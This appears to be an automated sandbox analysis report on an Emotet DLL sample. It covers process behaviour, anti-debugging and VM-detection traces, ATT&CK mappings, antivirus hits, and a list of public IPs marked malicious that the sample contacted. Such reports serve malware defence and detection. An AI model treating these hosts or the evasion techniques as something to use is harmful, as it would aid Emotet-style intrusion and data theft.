Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Vxxnweikxwymx\qsgm.ruf:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED32FE7 FindFirstFileExW,		0_2_6ED32FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED32FE7 FindFirstFileExW,		3_2_6ED32FE7

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: Amcache.hve.18.dr	Binary or memory string: VMware
Source: Amcache.hve.18.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.18.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.18.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.18.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.18.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.18.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000014.00000002.693957427.0000000005230000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.690547761.0000000005229000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.690564207.000000000522F000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.693828376.0000000005200000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.690533952.0000000005226000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.18.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.18.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.18.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.18.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: WerFault.exe, 00000014.00000002.693957427.0000000005230000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.690547761.0000000005229000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.690564207.000000000522F000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.690533952.0000000005226000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWk
Source: Amcache.hve.18.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED2D1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6ED2D1CC

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED1E4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

0_2_6ED1E4E0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED11290 GetProcessHeap,HeapAlloc,HeapFree,

0_2_6ED11290

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC4315 mov eax, dword ptr fs:[00000030h]	0_2_00BC4315
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED2C050 mov eax, dword ptr fs:[00000030h]	0_2_6ED2C050
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED2BFE0 mov esi, dword ptr fs:[00000030h]	0_2_6ED2BFE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED2BFE0 mov eax, dword ptr fs:[00000030h]	0_2_6ED2BFE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED312CB mov ecx, dword ptr fs:[00000030h]	0_2_6ED312CB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED3298C mov eax, dword ptr fs:[00000030h]	0_2_6ED3298C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED2C050 mov eax, dword ptr fs:[00000030h]	3_2_6ED2C050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED2BFE0 mov esi, dword ptr fs:[00000030h]	3_2_6ED2BFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED2BFE0 mov eax, dword ptr fs:[00000030h]	3_2_6ED2BFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED312CB mov ecx, dword ptr fs:[00000030h]	3_2_6ED312CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED3298C mov eax, dword ptr fs:[00000030h]	3_2_6ED3298C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007B4315 mov eax, dword ptr fs:[00000030h]	12_2_007B4315

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00BBE259 LdrInitializeThunk,

0_2_00BBE259

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED2CB22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6ED2CB22
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED2D1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6ED2D1CC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED329E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6ED329E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED2CB22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6ED2CB22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED2D1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6ED2D1CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED329E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6ED329E6

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4600 -ip 4600	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 316	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4600 -ip 4600	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 324	Jump to behavior

Source: loaddll32.exe, 00000000.00000000.642609511.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.643813100.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.663012293.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.663784404.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 00000015.00000002.819758478.0000000003020000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000000.642609511.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.643813100.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.663012293.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.663784404.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 00000015.00000002.819758478.0000000003020000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000000.642609511.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.643813100.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.663012293.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.663784404.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 00000015.00000002.819758478.0000000003020000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000000.642609511.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.643813100.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.663012293.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.663784404.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 00000015.00000002.819758478.0000000003020000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED2CC44 cpuid

0_2_6ED2CC44

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED2CE15 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6ED2CE15

Source: Amcache.hve.LOG1.18.dr, Amcache.hve.18.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.18.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.18.dr, Amcache.hve.18.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.3202148.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.630000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13b3b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.7a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6f2160.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.3202148.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.a33628.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.3180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13b3b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.610000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.bb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.3180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.a33628.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6f2160.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.35f42a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.35f42a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.573611715.0000000000835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.633116457.0000000003380000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.643248675.0000000000BB0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.770251757.0000000000A1A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.662542522.0000000000BB0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.642444707.00000000013AC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.770145294.00000000007A0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.610590191.00000000006DA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.695566646.00000000013AC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.642741548.00000000031EA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.663733322.00000000013AC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.620846196.0000000000610000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.642650507.0000000003180000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.633278452.00000000035DA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.662941579.00000000013AC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.610563535.0000000000630000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.643478517.00000000013AC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.641938795.0000000000BB0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.663509938.0000000000BB0000.00000040.00000010.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection12	Masquerading2	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery41	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
6zAcNlJXo7.dll	23%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.loaddll32.exe.bb0000.9.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.bb0000.6.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
5.2.rundll32.exe.3380000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
6.2.rundll32.exe.3180000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
4.2.rundll32.exe.630000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.7a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.2.loaddll32.exe.bb0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.bb0000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.bb0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
3.2.rundll32.exe.610000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.18.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
195.154.133.20	unknown	France	12876	OnlineSASFR	true
212.237.17.99	unknown	Italy	31034	ARUBA-ASNIT	true
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
104.245.52.73	unknown	United States	63251	METRO-WIRELESSUS	true
138.185.72.26	unknown	Brazil	264343	EmpasoftLtdaMeBR	true
81.0.236.90	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true
45.118.115.99	unknown	Indonesia	131717	IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
216.158.226.206	unknown	United States	19318	IS-AS-1US	true
107.182.225.142	unknown	United States	32780	HOSTINGSERVICES-INCUS	true
45.118.135.203	unknown	Japan	63949	LINODE-APLinodeLLCUS	true
50.116.54.215	unknown	United States	63949	LINODE-APLinodeLLCUS	true
51.68.175.8	unknown	France	16276	OVHFR	true
103.8.26.102	unknown	Malaysia	132241	SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY	true
46.55.222.11	unknown	Bulgaria	34841	BALCHIKNETBG	true
41.76.108.46	unknown	South Africa	327979	DIAMATRIXZA	true
103.8.26.103	unknown	Malaysia	132241	SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY	true
178.79.147.66	unknown	United Kingdom	63949	LINODE-APLinodeLLCUS	true
212.237.5.209	unknown	Italy	31034	ARUBA-ASNIT	true
176.104.106.96	unknown	Serbia	198371	NINETRS	true
207.38.84.195	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
212.237.56.116	unknown	Italy	31034	ARUBA-ASNIT	true
45.142.114.231	unknown	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	true
203.114.109.124	unknown	Thailand	131293	TOT-LLI-AS-APTOTPublicCompanyLimitedTH	true
210.57.217.132	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
58.227.42.236	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
185.184.25.237	unknown	Turkey	209711	MUVHOSTTR	true
158.69.222.101	unknown	Canada	16276	OVHFR	true
104.251.214.46	unknown	United States	54540	INCERO-HVVCUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532221
Start date:	01.12.2021
Start time:	20:45:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 36s
